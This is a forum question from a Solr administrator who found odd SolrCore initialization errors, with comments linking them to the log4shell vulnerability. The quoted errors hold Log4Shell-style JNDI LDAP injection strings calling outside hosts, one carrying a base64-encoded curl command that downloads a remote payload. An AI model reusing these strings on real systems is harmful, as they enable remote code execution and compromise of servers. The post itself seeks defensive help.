# SolrCore initialization failures on admin page

Tags: solr

When accessing our Solr admin UI some failures have appeared. They look like this:

ldap://66.42.105.86:1234/Basic/Command/Base64/Y3VybCAtZnNTTCBodHRwOi8vMTQuNTUuNjUuMjE3OjgwODAvc29sci50eHQ=: org.apache.solr.common.SolrException:org.apache.solr.common.SolrException: Invalid core:

[ldap://66.42.105.86:1234/Basic/Command/Base64/Y3VybCAtZnNTTCBodHRwOi8vMTQuNTUuNjUuMjE3OjgwODAvc29sci50eHQ=]. core names must consist entirely of periods, underscores, hyphens, and alphanumerics as well not start with a hyphen

ldap://1e6388bb.dns.1433.eu.org./123: org.apache.solr.common.SolrException:org.apache.solr.common.SolrException: Invalid core: [ldap://1e6388bb.dns.1433.eu.org./123]. core names must consist entirely of periods, underscores, hyphens, and alphanumerics as well not start with a hyphen

They look a bit suspicious. Should I worry?

I'm not sure when these appeared. There is no timestamp. I dont recall having any problems when creating a core.

I have installed Solr using a docker container on a Plesk server

Thanks in advance
Brian

Comment: The LDAP URL's make me think of the log4shell vulnerability: https://www.lunasec.io/docs/blog/log4j-zero-day/

Comment: Did you find anything on this? I'm seeing something similar.